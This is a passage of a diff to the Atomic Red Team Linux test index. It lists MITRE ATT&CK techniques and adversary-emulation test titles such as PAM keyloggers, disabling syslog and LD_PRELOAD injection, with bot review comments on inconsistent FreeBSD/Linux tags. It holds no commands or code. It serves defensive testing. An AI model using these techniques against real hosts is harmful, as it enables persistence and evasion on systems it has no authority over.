- Atomic Test #8: Stop/Start Packet Filter [linux]
- Atomic Test #9: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #10: Turn off UFW logging [linux]
- Atomic Test #11: Add and delete UFW firewall rules [linux]
- Atomic Test #12: Add and delete Packet Filter rules [linux]
- Atomic Test #13: Edit UFW firewall user.rules file [linux]
- Atomic Test #14: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #15: Edit UFW firewall sysctl.conf file [linux]
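Review bot: T1562.004 #8 `Stop/Start Packet Filter` and #12 `Add and delete Packet Filter rules` are tagged `[linux]`, but pf is a BSD firewall with no Linux counterpart; tag them for FreeBSD or they will be picked up on Linux hosts and fail (by the header counts, `-73,18 +95,20`, this hunk adds six lines and removes four, so these two are likely the extra additions). In the same hunk the four T1070.006 timestomp tests lose `freebsd` (`[freebsd, linux, macos]` against `[linux, macos]`), which pulls in the opposite direction; pick one convention for the whole index.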
@@ -94,8 +118,8 @@
- Atomic Test #19: Modify/delete iptables firewall rules [linux]
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
@@ -104,16 +128,21 @@
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- Atomic Test #7: Make and modify capabilities of a binary [linux]
- Atomic Test #8: Provide the SetUID capability to a file [linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
- Atomic Test #3: Logging Configuration Changes on Linux Host [linux]
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
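Review bot: test names in this hunk spell the FreeBSD variant two ways, `(freebsd)` on T1548.001 #2/#4/#6 and `on FreeBSD Host` on T1562.006 #2/#4, and elsewhere in the file `(FreeBSD)` is used as well; pick one suffix so the index can be searched reliably. Separately, T1548.001 #9 and #10 (setuid/setgid reconnaissance) appear both as `[freebsd, linux]` and as `[linux]` for the same test, so the platform-tag question raised above applies here too.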
@@ -128,16 +157,20 @@
- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Disable history collection (freebsd) [linux]
- Atomic Test #3: Mac HISTCONTROL [macos, linux]
- Atomic Test #4: Clear bash history [linux]
- Atomic Test #5: Setting the HISTCONTROL environment variable [linux]
- Atomic Test #6: Setting the HISTFILESIZE environment variable [linux]
- Atomic Test #7: Setting the HISTSIZE environment variable [linux]
- Atomic Test #8: Setting the HISTFILE environment variable [linux]
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
- Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable syslog (freebsd) [linux]
- Atomic Test #3: Disable Cb Response [linux]
- Atomic Test #4: Disable SELinux [linux]
- Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
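Review bot: T1562.003 #3 `Mac HISTCONTROL` is tagged `[macos, linux]` while its name says Mac; if it runs on both, rename it (no other entry in this group puts a platform in the name), and if it is macOS-only, drop `linux`. Also worth a look: #1 `Disable history collection` and #5 `Setting the HISTCONTROL environment variable` sit under the same HISTCONTROL technique with names that do not say how they differ; a distinguishing word in each name would help whoever picks tests from this index.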
@@ -145,28 +178,30 @@
- Atomic Test #40: Suspend History [linux]
- Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
- Atomic Test #42: Clear Pagging Cache [linux]
- Atomic Test #43: Disable Memory Swap [freebsd, linux]
- Atomic Test #43: Disable Memory Swap [linux]
- Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Decode base64 Data into Script [linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux]
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on FreeBSD [linux]
- Atomic Test #3: Install root CA on Debian/Ubuntu [linux]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [freebsd, linux, macos]
- Atomic Test #4: CC compile [freebsd, linux, macos]
- Atomic Test #5: Go compile [freebsd, linux, macos]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
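Review bot: T1027 #1 and #2 share the exact name `Decode base64 Data into Script` and differ only in tags (`[macos, linux]` against `[linux]`), so a reader of the index cannot tell which is which; if #2 is the FreeBSD variant, suffix it `(freebsd)` like the neighbouring entries. Two smaller things in this hunk: T1562.001 #42 `Clear Pagging Cache` should read `Paging`, and T1036.003 #2 `Masquerading as FreeBSD or Linux crond process.` keeps FreeBSD in its name on the side that drops it from the tag.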
@@ -177,10 +212,11 @@
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Filesystem - FreeBSD [linux]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
@@ -190,15 +226,19 @@
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #2: Space After Filename [macos, linux]
- Atomic Test #3: Space After Filename (FreeBSD) [linux]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

# persistence
@@ -208,6 +248,7 @@
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
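Review bot: by the header counts (`-208,6 +248,7`) this hunk adds exactly one line and removes none, presumably T1556.003 #3 `Malicious PAM module`. It is tagged `[linux]` only, whereas #1 `Malicious PAM rule` has a FreeBSD counterpart in #2; if the module test is Linux-only because of the module path or build, say so in the name as the other entries do, otherwise add the FreeBSD variant for parity. Since a faulty PAM module can lock every login on the host, please confirm that the test's cleanup restores the original PAM configuration; the index cannot show that, so it has to be checked in the test itself.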
@@ -216,31 +257,36 @@
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap EXIT (freebsd) [linux]
- Atomic Test #3: Trap SIGINT [macos, linux]
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a FreeBSD system [linux]
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #4: Active Directory Create Admin Account [linux]
@@ -264,8 +310,9 @@
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
- Atomic Test #3: Add command to .shrc [linux]
- Atomic Test #4: Append to the system shell profile [linux]
- Atomic Test #5: Append commands user shell profile [linux]
- Atomic Test #6: System shell profile scripts [linux]
- Atomic Test #7: Create/Append to .bash_logout [linux]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
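Review bot: T1546.004 #3 `Add command to .shrc` is tagged `[linux]`, but `~/.shrc` is the per-user startup file of FreeBSD's `/bin/sh` (FreeBSD's default `.profile` exports `ENV=$HOME/.shrc`); on a typical Linux host nothing reads it unless `ENV` is set, so on a Linux runner the test writes a file that is never executed and the technique is not actually exercised. Tag it for FreeBSD, or have the test set `ENV` as well. #4 and #5 in the same hunk appear as both `[freebsd, linux]` and `[linux]`, the same tag disagreement seen elsewhere in this merge.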
@@ -278,24 +325,31 @@
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- Atomic Test #4: rc.local (FreeBSD) [linux]
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create SysV Service [linux]
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [linux]

# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
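Review bot: naming drifts within this hunk: T1037.004 #4 uses `(FreeBSD)`, T1053.002 #3 uses a bare `freebsd` with no parentheses (`At - Schedule a job freebsd`), and T1078.003 mixes `(FreeBSD)` on #9/#11 with `(freebsd)` on #13; T1543.002 #3 also has a stray space before the comma in `Enable the service , Modify`. These names presumably come from the technique files, so fix them there and let the index follow.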
@@ -324,9 +378,10 @@
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -337,20 +392,20 @@
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #14: whois file download [freebsd, linux, macos]
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #27: Linux Download File and Run [linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
- Atomic Test #1: Connection Proxy [linux, macos]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -359,18 +414,21 @@
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: X Windows Capture (freebsd) [linux]
- Atomic Test #5: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
- Atomic Test #4: Logging sh history to syslog/messages [linux]
- Atomic Test #5: Bash session based keylogger [linux]
- Atomic Test #6: SSHD PAM keylogger [linux]
- Atomic Test #7: Auditd keylogger [linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -379,16 +437,17 @@
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -421,13 +480,17 @@
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Sudo usage (freebsd) [linux]
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -435,7 +498,9 @@
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap EXIT (freebsd) [linux]
- Atomic Test #3: Trap SIGINT [macos, linux]
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
@@ -443,12 +508,15 @@
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- Atomic Test #7: Make and modify capabilities of a binary [linux]
